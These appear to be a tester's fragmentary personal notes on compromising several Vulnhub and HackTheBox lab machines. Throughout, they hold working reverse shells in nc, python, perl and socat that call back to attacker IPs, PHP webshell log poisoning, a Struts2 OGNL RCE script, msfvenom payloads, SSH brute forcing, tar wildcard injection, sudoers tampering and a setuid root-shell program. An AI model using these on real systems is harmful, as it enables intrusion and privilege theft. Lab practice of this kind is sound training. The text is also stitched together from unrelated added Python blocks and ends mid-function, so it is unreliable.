My Practice on Vulnhub boxes
netdiscover -r ip
nmap -p- -sV ip
/pChart2.1.3/index.php - vulnerable - searchsploit lfi
Since we have an LFI and we know that the server is running Apache, let's search for the Apache config file. After checking this, I managed to find the httpd.conf file.
/usr/local/etc/apache22/httpd.conf
/phptax
This script drops an rce.php webshell into the /phptax/data/ directory.
mkfifo pipe;nc 192.168.15.141 1234<pipe|/bin/sh>pipe 2>pipe;rm pipe
/rce.php?cmd=nc 192.168.15.141 1234 > php-reverse-shell.php
uname -a shows the host is FreeBSD 9.0 release.
nc -lvp 1234 < 26368.c
nc 192.168.15.141 1337 > 26368.c
gcc -o 26368 26368.c
===================================================
netdiscover -r ip
nmap -p- -sS -A ip
Great, we got many services running; the notable ones are:
Port 22: SSH
Port 25: SMTP
Port 79: Finger
Port 110: POP3
Port 111: RPCbind
Port 143: IMAP
Port 512: RSH (Remote shell)
Port 513: RLogin
Port 514: shell?
enum4linux
nc -nv ip 25
VRFY vulnix
VRFY abatchy
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.72
finger [email protected]
NFS service - 2069
showmount ip
showmount -e ip
mkdir /tmp/nfs
mount -t nfs ip:/home/vulnix /tmp/nfs -o nolock
gaining access through ssh
hydra -l user -P rockyou.txt ip ssh -t 4
id vulnix
useradd -u 2008 vulnix
mount -t nfs ip:/home/vulnix /tmp/mnt -o nolock
Let’s generate keys for SSH so we can login into vulnix!
Create an ssh key pair by running ssh-keygen.
Create the .ssh directory on the mounted share: /home/vulnix/.ssh.
Copy the content of the public key to /home/vulnix/.ssh.
SSH into vulnix@victim_ip
Also due to the fact that there’s a secure_path set, we can’t manipulate the PATH variable (except by running sudo -e which we can’t).
Let’s edit the file and update /home/vulnix so we’re able to
Restart the VM and remount the shared directory. We can upload a local exploit to gain root, or just copy /bin/bash and give it setuid permissions.
We’ll run bash with -p flag to keep the original file’s permissions.
mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt
cp /bin/bash .
chmod 4777 bash
ls -al
./bash -p
mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3
useradd -u 2008 vulnix
ssh -i id_rsa [email protected]
By using sudoedit /etc/exports, it's possible to add another share into the export list, one which uses the no_root_squash option; this prevents root users from being remapped to the nobody user:
/home/vulnix (rw,root_squash)
/root (rw,no_root_squash)
mount 192.168.22.134:/root mnt -o vers=3
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.33
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.33
Port 111 - Enumerating RPC (rpcbind 2-4). An RPC service is running, so we can enumerate further using rpcinfo.
[email protected]:~# rpcinfo -p 192.168.1.33
nmap -sU -sT -p 2049 192.168.1.33
$ apt-cache search showmount
nfs-common - NFS support files common to client and server
$ apt-get install nfs-common
Enumeration is important, without knowing there’s a user called user you most likely won’t be able to solve this VM. Doesn’t matter which service you use, you can enumerate SMTP, Finger, NFS, …
showmount --exports 192.168.1.33
Export list for 192.168.1.33:
/home/vulnix *
Let's mount the remote share on our local machine.
[email protected]:~# mkdir /tmp/nfs
[email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
useradd -u 2008 vulnix
[email protected]:~# tail -1 /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/sh
[email protected]:~# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ cd /tmp/nfs
$ ls -la
total 20
drwxr-x---  2 vulnix vulnix 4096 Sep  2  2012 .
drwxrwxrwt 15 root   root   4096 May 16 18:17 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile
$ pwd
/tmp/nfs
ls /root/.ssh/
[email protected]:~# ssh-keygen
[email protected]:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
[email protected]:~# cp /bin/bash /tmp/nfs/
[email protected]:~# cd /tmp/nfs/
[email protected]:/tmp/nfs# ls -la
-=======================================
nmap to find ports and services
smtp: find usernames with the enum scripts, using the metasploit wordlist unix_users.txt
finger to validate users
showmount -e ip - to validate the shared folders
rpcinfo ip - to validate the running services (nfs found) 2049
now mounting the folder on to the local machine, but it shows access denied; with another command we also got the uid
mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs - access denied
mkdir mnt && mount 192.168.22.134:/home/vulnix mnt -o vers=3 - got some output, uid 2008
create a ssh key and upload it on server pub key on /tmp/mnt
echo 'key' > authorized_keys
login with vulnix
for ssh bruteforcing we did a hydra bruteforce with the following command:
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.78.130 ssh -t 4
check the user uid - id vulnix
=======
for shell ssh -i id_rsa -l vulnix 192.168.78.130
[email protected]:/# mount -t nfs 192.168.78.130:/ -o vers=2 mount
cc614640424f5bd60ce5d5264899c3be
=========================================================
nmap -Pn ip - because ICMP is blocked on the box
22 80 port found this box
test directory found
curl -v -X OPTIONS ip/test
found put,delete method working on the box
PUT file upload shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.78.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
mywriteup-
sickos - chkrootkit vulnerability cron jobs
nmap -Pn ip - because ICMP is blocked on the box
22 80 port found this box
test directory found
curl -v -X OPTIONS ip/test
found put,delete method working on the box
PUT file upload shell
with the nmap script: nmap -p 80 ip --script http-put --script-args http-put.url='/test/php.php',http-put.file='put.php'
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.128 443 >/tmp/f' >> update
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update - this adds www-data to the sudoers list
perl -e 'use Socket;$i="192.168.209.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
echo "perl -e 'use Socket;\$i=\"192.168.209.151\";\$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" > /tmp/update
for root - above reverse shell
with curl low priv shell
curl "http://192.168.78.131/test/shell.php?cmd=python+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%22192.168.78.128%22%2c443))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3b+os.dup2(s.fileno()%2c2)%3bp%3dsubprocess.call(%5b%22%2fbin%2fsh%22%2c%22-i%22%5d)%3b%27"
============================================
linux permissions
r = read permission
w = write permission
x = execute permission
- = no permission

Number  Permission Type           Symbol
0       No Permission             ---
1       Execute                   --x
2       Write                     -w-
3       Execute + Write           -wx
4       Read                      r--
5       Read + Execute            r-x
6       Read + Write              rw-
7       Read + Write + Execute    rwx

'764' absolute code says the following:
Owner can read, write and execute
Usergroup can read and write
World can only read

u  user/owner
g  group
o  other
a  all

+  Adds a permission to a file or directory
-  Removes the permission
=  Sets the permission and overrides the permissions set earlier.
Changing Ownership and Group For changing the ownership of a file/directory, you can use the following command:
chown user filename
In case you want to change the user as well as group for a file or directory use the command
chown user:group filename
User rights/Permissions: The first character (the one I marked with an underscore) is the special permission flag, which can vary. The following set of three characters (rwx) is the owner's permissions. The second set of three characters (rwx) is the group's permissions. The third set of three characters (rwx) is the permissions for all other users. Following that grouping, the integer shows the number of hard links to the file. The last piece is the owner and group assignment, formatted as Owner:Group.
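As an added worked example (my own code, not from these notes), the conversion between the symbolic and numeric forms described in this section, including the setuid, setgid and sticky bits that ls shows as s/S and t/T in the execute position; the function names and the sample modes are my own choices.

```python
"""Convert between the symbolic (ls -l) and numeric (chmod) permission forms."""

# Number -> description, as in the table above
PERMISSION_NAMES = {
    0: "no permission", 1: "execute", 2: "write", 3: "write and execute",
    4: "read", 5: "read and execute", 6: "read and write",
    7: "read, write and execute",
}


def symbolic_to_octal(mode):
    """'rwxrw-r--' -> '0764', '-rwsr-xr-x' -> '4755'.

    Accepts the 9 permission characters or the full 10-character ls -l field
    (file type first). Lower-case s/t mean the special bit plus execute;
    upper-case S/T mean the special bit without execute.
    """
    if len(mode) == 10:          # drop the file-type character (-, d, l, ...)
        mode = mode[1:]
    if len(mode) != 9:
        raise ValueError("expected 9 permission characters, got %r" % mode)
    special = 0
    digits = []
    for idx, triad in enumerate((mode[0:3], mode[3:6], mode[6:9])):
        value = 0
        for ch, bit in zip(triad, (4, 2, 1)):
            if ch in "rwx":
                value |= bit
            elif ch in "sS" and bit == 1 and idx < 2:
                special |= 4 >> idx      # owner -> setuid (4), group -> setgid (2)
                value |= 1 if ch == "s" else 0
            elif ch in "tT" and bit == 1 and idx == 2:
                special |= 1             # sticky bit
                value |= 1 if ch == "t" else 0
            elif ch != "-":
                raise ValueError("bad permission character %r in %r" % (ch, mode))
        digits.append(value)
    return "%d%d%d%d" % (special, digits[0], digits[1], digits[2])


def octal_to_symbolic(octal):
    """'764' -> 'rwxrw-r--', '4755' -> 'rwsr-xr-x'."""
    m = int(octal, 8)
    special = (m >> 9) & 7
    out = []
    for idx, shift in enumerate((6, 3, 0)):
        v = (m >> shift) & 7
        r = "r" if v & 4 else "-"
        w = "w" if v & 2 else "-"
        x = "x" if v & 1 else "-"
        if idx == 0 and special & 4:
            x = "s" if v & 1 else "S"
        elif idx == 1 and special & 2:
            x = "s" if v & 1 else "S"
        elif idx == 2 and special & 1:
            x = "t" if v & 1 else "T"
        out.append(r + w + x)
    return "".join(out)


def describe(octal):
    """Spell out a numeric mode the way the '764' example above does."""
    m = int(octal, 8)
    parts = []
    for who, shift in (("owner", 6), ("group", 3), ("others", 0)):
        parts.append("%s: %s" % (who, PERMISSION_NAMES[(m >> shift) & 7]))
    if (m >> 9) & 4:
        parts.append("setuid set: runs with the file owner's uid")
    if (m >> 9) & 2:
        parts.append("setgid set")
    if (m >> 9) & 1:
        parts.append("sticky bit set")
    return "; ".join(parts)


if __name__ == "__main__":
    for sample in ("764", "4777", "4755"):
        print(sample, octal_to_symbolic(sample), "->", describe(sample))
```

The describe() output for 4777 shows why the chmod 4777 on a copied bash elsewhere in these notes matters: the leading 4 is the setuid bit, so the execute position of the owner triad is shown as s rather than x, and that is the field to watch in find / -perm -u=s output.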
==============================================
one method: nmap -sC -sV 10.10.10.157
dirb ip
monitoring
change request in to post method
centreon post request api/
centreon/api/index.php?action=authenticate
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/centreon/api/index.php?action=authentication:username=^USER^&password=^PASS^:Bad Credentials" -V
python -c 'import pty; pty.spawn("/bin/bash")'
on victim (attacker mode): socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
on kali (listen mode): socat file:`tty`,raw,echo=0 tcp-listen:4444
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
suid find / -perm /4000
screen 4.5.0 has suid bit
wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
==================================================================================
nmap -v -p 1-65535 -sV -O -sT 192.168.221.150
decode the image and got the password
keKkeKKeKKeKkEkkEk
PHP reverse shell The file name shell.php.png was used to bypass the web application filtering, the file was still executed as PHP (likely due to incorrectly configured Apache MIME types). A reverse shell successfully connected back to a netcat listener.
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
cat cryptpass.py
import base64, codecs, sys

def encodeString(s):
    # base64-encode the input, reverse the result, then apply rot13
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult = encodeString(sys.argv[1])
print(cryptoResult)

python script to decrypt the password
import base64, codecs, sys

def encodeString(s):
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(s):
    # undo the steps in reverse order: reverse, rot13 (its own inverse), base64-decode
    string = s[::-1]
    string = codecs.decode(string, 'rot13')
    return base64.b64decode(string).decode()

print(decodeString(sys.argv[1]))
sudo -u fristi .secret_admin_stuff/doCom /bin/sh
php reverse shell upload and get back to the nc
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
3rd method
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.0.3",5556));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
import base64, codecs, sys

def encodeString(s):
    # base64-encode the input, reverse the result, then apply rot13
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult = encodeString(sys.argv[1])
print(cryptoResult)

decode string
import base64, codecs, sys

def decodeString(s):
    # rot13 is its own inverse; then undo the reversal and the base64 encoding
    base64string = codecs.decode(s, 'rot13')
    return base64.b64decode(base64string[::-1]).decode()

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult)
[[email protected] ~]$ python decryptpass.py $(cat whoisyourgodnow.txt)
LetThereBeFristi!
[[email protected] ~]$ su fristigod
Password:
bash-4.1$ whoami
fristigod
sudo -u fristi ./doCom /bin/bash
import base64, codecs
in_string = "=RFn0AKnlMHMPIzpyuTI0ITG"
in_string_1 = in_string[::-1]
in_string_2 = codecs.decode(in_string_1, "rot13")
print(base64.b64decode(in_string_2))
LetThereBeFristi!
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
==================================================================
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30
bash-4.1$ sudo -u fristi ./doCom whoami
==========================================================
11/12/2019
192.168.30.0/24 192.168.40.0/24
kali <---------------> straylight <---------------> neuromancer (.128) (.129) (.128) (.129)
nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 20 -u http://192.168.30.129/
Hmm. What do we have here? /freeside/ looks interesting.
There’s another web-related port, 3000/tcp and ntopng is running behind it.
/turing-bolo/ has something that finally looks like an attack surface.
PHP Injection There’s a Local File Inclusion (LFI) vulnerability with the bolo parameter in bolo.php, demonstrated below.
All four files case.log, molly.log, armitage.log, and riviera.log are available on the server, indicating the presence of the LFI vulnerability.
How can I inject PHP into the server?
A quick search in Google for “postfix log location” seems to suggest the logs are at /var/log/mail.log. This plays well into our hands because of the .log extension. Let’s explore this path of attack. ip/bolo.php?bolo=../../../../var/log/mail
<?php echo shell_exec($_GET['cmd']);?>
nc ip 25
Helo hackerman
MAIL FROM: "hackerman <?php echo shell_exec($_GET['cmd']);?>"
[email protected]:~# nc 192.168.56.102 25
220 straylight ESMTP Postfix (Debian/GNU)
MAIL FROM:[email protected]
250 2.1.0 Ok
RCPT TO:<?php echo system($_POST['cmd']); ?>
501 5.1.3 Bad recipient address syntax
perl -e 'use Socket;$i="192.168.30.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
After encoding
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27
Long story short. I notice /bin/screen is a symbolic link to /bin/screen-4.5.0, which is setuid to root. Like they always say, Google is your best friend.
41154 - 4.5 screen
now move to next machine /structs2_2.3
Next Attack: Neuromancer
nc and socat are available on the machine
for port scanning
for p in $(seq 1 65535); do nc -nvzw1 ip $p 2>&1; done | grep open
socat tcp-listen:8009,fork tcp:192.168.40.129:8009 &
socat tcp-listen:8080,fork tcp:192.168.40.129:8080 &
socat tcp-listen:34483,fork tcp:192.168.40.129:34483 &
netstat -plunt
from attacker machine
socat tcp-listen:4321,fork tcp:192.168.30.128:4321 &
Struts2 Showcase Remote Command Execution
exploit.sh
#!/bin/bash
LHOST=192.168.30.128
LPORT=4321
RHOST=192.168.30.129
RPORT=8080
TARGETURI=struts2_2.3.15.1-showcase/integration
URL=http://$RHOST:$RPORT/$TARGETURI/saveGangster.action
CMD="$1"
PAYLOAD=""
PAYLOAD="${PAYLOAD}%{"
PAYLOAD="${PAYLOAD}(#[email protected]@DEFAULT_MEMBER_ACCESS)."
PAYLOAD="${PAYLOAD}(#_memberAccess?(#_memberAccess=#dm):"
PAYLOAD="${PAYLOAD}((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
PAYLOAD="${PAYLOAD}(#ognlUtil=#container.getInstance(@[email protected]))."
PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedPackageNames().clear())."
PAYLOAD="${PAYLOAD}(#ognlUtil.getExcludedClasses().clear())."
PAYLOAD="${PAYLOAD}(#context.setMemberAccess(#dm))))."
PAYLOAD="${PAYLOAD}(@[email protected]().exec('$CMD'))"
PAYLOAD="${PAYLOAD}}"

usage() {
    echo "Usage: $(basename $0) [COMMAND]" >&2
    exit 1
}

if [ $# -ne 1 ]; then
    usage
fi

curl -s -H "Referer: http://$RHOST:$RPORT/$TARGETURI/editGangster" --data-urlencode "name=$PAYLOAD" --data-urlencode "age=20" --data-urlencode "__checkbox_bustedBefore=true" --data-urlencode "description=1" -o /dev/null $URL
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.40.128 LPORT=4321 -f elf -o rev
./exploit.sh "wget -O /tmp/rev ip:port/rev"
got the shell now priv esccalation
for superior shell
ssh -i /root/keys/ta -p 34483 [email protected]
php://filter/convert.base64-encode/resource=case
[email protected]:~# nc 192.168.56.102 25
220 straylight ESMTP Postfix (Debian/GNU)
MAIL FROM:[email protected]
250 2.1.0 Ok
RCPT TO:<?php echo system($_POST['cmd']); ?>
501 5.1.3 Bad recipient address syntax
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=id"
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=which nc"
[email protected]:~# curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"
$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/html/turing-bolo$ find / -perm -u=s 2>/dev/null
db.com/exploits/41154, which I saved on my machine as exploit.sh and transferred to the target
[email protected]:~# nc -nvlp 2222 < exploit.sh
[email protected]:/var/www/html/turing-bolo$ cd /tmp
[email protected]:/tmp$ nc 192.168.56.101 2222 > exploit.sh
python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/etc#
[email protected]:/tmp# for i in $(seq 1 255); do ping -c 1 192.168.212.$i; done | grep "bytes from"
[email protected]:/tmp# for i in $(seq 1 65535); do nc -nvz -w 1 192.168.212.4 $i 2>&1; done | grep -v "Connection refused"
[email protected]:/tmp# socat TCP-LISTEN:8009,fork,reuseaddr TCP:192.168.212.4:8009 &
[1] 14514
[email protected]:/tmp# socat TCP-LISTEN:8080,fork,reuseaddr TCP:192.168.212.4:8080 &
[2] 14521
[email protected]:/tmp# socat TCP-LISTEN:34483,fork,reuseaddr TCP:192.168.212.4:34483 &
[3] 14524
[email protected]:/tmp# socat TCP-LISTEN:6666,fork,reuseaddr TCP:192.168.56.101:6666 &
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "nc 192.168.212.3 6666 -e /bin/bash" - did not work
And then setup a file in /var/www/html called callback.sh which contained
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.212.3 6666 >/tmp/f
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.212.3:8888/callback.sh -O /tmp/callback.sh"
for permission:
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/callback.sh"
fired
[email protected]:~# python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/callback.sh"
got the shell now move to priv escalation
uname -a
It wasn't there, so I downloaded the exploit to /var/www/html on my machine as priv.c and compiled it locally
[email protected]:~# gcc priv.c -o priv
====================================================================================
This is a command interpreter (shell). So by running sudo ash we can get a root shell.
whoami;id
AWK is a special-purpose programming language designed for text processing and typically used as a data extraction and reporting tool. Since we can run awk using sudo, we can easily escalate our privileges to root.
Bash is a Unix shell and command language. As with ash we can abuse our sudo rights to privesc.
[email protected]:~$ sudo bash
The Bourne shell (sh) is a shell, or command-line interpreter, for computer operating systems.
The C shell (csh or the improved version, tcsh) is a Unix shell. As with for example sh we can use it to escalate to root.
We can abuse curl in order to overwrite files as root. By creating a simple setuid binary on my machine, using curl to fetch the program and overwriting an already setuid binary owned by root on the target system, we can get a root shell.
Setuid binary
#include <stdio.h>
#include <unistd.h>

int main(void){
    /* become root (the binary is setuid root, so these succeed) */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp takes an argv array terminated by NULL, not a list of strings */
    char *const argv[] = {"/bin/sh", NULL};
    execvp(argv[0], argv);
    return 1;
}
Compile this program and start a python SimpleHTTPServer and go to the victim machine and fetch the file using curl.
Dash is an acronym for Debian Almquist shell (dash). It is a Unix and Linux shell which is much smaller than bash but still aiming at POSIX-compliancy. As with sh, bash etc. we just sudo dash and get a root shell.
ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, but it can also execute commands from inside ed. Because of this, getting a root shell is really straightforward.
env is a shell command for Linux, Unix, and Unix-like operating systems. It can be used to print a list of the current environment variables, or to run another program in a custom environment without modifying the current one.
Expect is a program that "talks" to other interactive programs according to a script. Following the script, expect knows what can be expected from a program and what the correct response should be.
Find is a command for recursively filtering objects in the file system based on a simple conditional mechanism. You can use find to search for a file or directory on your file system. Find also has an -exec parameter which we can abuse to escalate our privileges.
By issuing the command ftp without any parameters, we can run commands from within ftp.
We can execute commands from inside less. sudo less /etc/profile !/bin/sh
As above, we can execute commands from inside of man.
[email protected]:~$ sudo more /var/log/lastlog !/bin/sh
scp allows files to be copied to, from, or between different hosts. It uses ssh for data transfer and provides the same authentication and same level of security as ssh.
[email protected]:~$ TF=$(mktemp)
[email protected]:~$ echo 'sh 0<&2 1>&2' > $TF
[email protected]:~$ chmod +x "$TF"
[email protected]:~$ sudo scp -S $TF x y:
# whoami;id
Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes - including giving us a root shell!
We can use the ProxyCommand option to spawn an interactive shell.
As with man etc. we can execute commands from inside of vi.
The Z Shell or zsh is an interactive UNIX shell and powerful command-line interpreter for scripting languages, including shell scripting. Since it's an interactive shell we can easily get a root shell.
Pico is a simple, display-oriented text editor based on the pine message composer.
Depending on how rvim was compiled, we can spawn a root shell. In this case rvim was compiled with Python support.
Since we can use perl with sudo, we can do the following to get a root shell.
Tclsh is a shell-like application that reads Tcl commands from its standard input or from a file and evaluates them.
We can abuse the help function of git to get code execution as root.
Script command records a shell session for you so that you can look at the output that you saw at the time and you can even record with timing so that you can have a real-time playback. It is really useful and comes in handy in the strangest kind of times and places.
But this can obviously be abused to get a root shell.
Enumerating the box we find the following script running as a cronjob.
#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
This is a backup script taking everything from a users home dir, compressing it using tar and saving it to /etc/backups.
The problem with tar is that when using wildcards an attacker can inject his own arguments.
The following is taken from the man page (man tar):
--checkpoint[=NUMBER]
    display progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION
    execute ACTION on each checkpoint
echo "mkfifo /tmp/0wned; nc 192.168.1.142 1337 0</tmp/0wned | /bin/sh > /tmp/0wned 2>&1; rm /tmp/0wned" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Now we setup a listener on our machine and wait for the cronjob to execute.
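An added example of how a defender audits for this, not code from these notes or from the box: it lists the entries in a home directory that a shell glob would hand to tar as options, and builds the backup command in a form that takes no glob at all. The function names, the constructed listing SAMPLE_HOME_LISTING and the /home/susan path used in the usage are my own assumptions.

```python
"""Audit a home directory for names that a wildcard in 'tar ... *' would turn into options."""
import os

# Constructed listing modelled on the trick above: the last two entries are not
# files a user would normally create, they are tar options spelt as file names.
SAMPLE_HOME_LISTING = [
    ".bashrc",
    "notes.txt",
    "shell.sh",
    "--checkpoint-action=exec=sh shell.sh",
    "--checkpoint=1",
]

BACKUP_DIR = "/etc/backups"   # as in the cron job above


def option_like_names(names):
    """Return the entries a shell glob would pass to tar as options, not paths.

    The shell expands * to the (non-hidden) entry names in sorted order; tar
    then parses every argument, so a name starting with '-' is read as a flag.
    """
    return sorted(n for n in names if n.startswith("-"))


def audit_directory(path):
    """Same check on a real directory (requires read access to it)."""
    return option_like_names(os.listdir(path))


def safe_backup_argv(home_dir, user):
    """The backup call rewritten so entry names can never become arguments.

    '-C home_dir .' archives the directory contents without any glob, so the
    member list is fixed at '.' and tar never sees an attacker-chosen string.
    """
    return ["/bin/tar", "-zcf", "%s/home-%s.tgz" % (BACKUP_DIR, user),
            "-C", home_dir, "."]


if __name__ == "__main__":
    flagged = option_like_names(SAMPLE_HOME_LISTING)
    print("suspicious entries:", flagged)
    print("safe command:", " ".join(safe_backup_argv("/home/susan", "susan")))
```

One difference to keep in mind when swapping the cron line for the safe form: `-C dir .` also includes dotfiles, which the original `*` glob skipped, so the archives grow slightly; the gain is that no entry name in the directory is ever parsed by tar as an option.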
Looking at the home folders we see susan. Listing all files - including hidden files - we find .secret.
[email protected]:/home/susan$ cat .secret MySuperS3cretValue!
[email protected]:/home/susan$ su - susan Password: [email protected]:~$ whoami;id susan
Enumerating the machine for setuid binaries we find the following:
xxd is owned by root and the setuid bit is set. By running this program we will run in the context of root, possibly giving us a way to escalate our privileges. It can however only be run by root or members of the group "itservices" - exactly the group susan is a member of!
Let's dump /etc/shadow!
Doing a nmap scan against the machine reveals that NFS is running. Let's first see if we can find any open shares which we can mount.
Awesome! Let's mount the share to /mnt/peter.
mount 192.168.1.140:/home/peter /mnt/peter
Looking at the UID and GID we see 1001/1005. This means that I don't have that specific group and user on my system, so even though the share is now mounted I can't write files to it.
To circumvent this, let's create a user with a UID of 1001 and a group with the GID 1005, and then change to that user and try to write a file.
So, how do we utilize this to escalate to peter? How about generating a SSH key and adding that to peter's authorized_keys? Let's try.
Let's first generate a new SSH key.
Now, let's create a .ssh directory inside peter's home directory (on the share) and add the public key we just generated to authorized_keys.
pwd
mkdir .ssh
touch .ssh/authorized_keys
cat /home/peter/.ssh/id_rsa.pub > .ssh/authorized_keys
ssh [email protected]
Looking at the groups peter is added to we see docker. This is a really powerful group and there's ton of information on the internet on how to privesc using the docker group.
The Docker Hub already has an image which we can use to get a root shell, called "rootplease".
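Both NFS tricks on this page come down to settings in /etc/exports: the no_root_squash export added with sudoedit in the Vulnix notes earlier, and the uid/gid matching with useradd used here to write to peter's share. As an added example, not code from these notes or from any of the boxes, a small audit of that file that flags the settings which make each of them possible; parse_exports, audit_exports and the constructed SAMPLE_EXPORTS are my own.

```python
"""Parse /etc/exports and flag the settings that make the NFS tricks above possible."""
import re

# Constructed sample, modelled on the two export lines shown earlier on this page.
# In /etc/exports an empty client field means "every host".
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/vulnix (rw,root_squash)
/root (rw,no_root_squash)
/srv/data 192.168.22.0/24(ro,sync,all_squash)
"""

# one client spec: optional host/network, optional (opt,opt,...) list
CLIENT_RE = re.compile(r"([^(]*)(?:\(([^)]*)\))?")


def parse_exports(text):
    """Return a list of (path, client, options) triples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]
        for tok in clients:
            m = CLIENT_RE.fullmatch(tok)
            if m is None:
                continue
            host = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Return (path, client, finding) tuples for the risky settings."""
    findings = []
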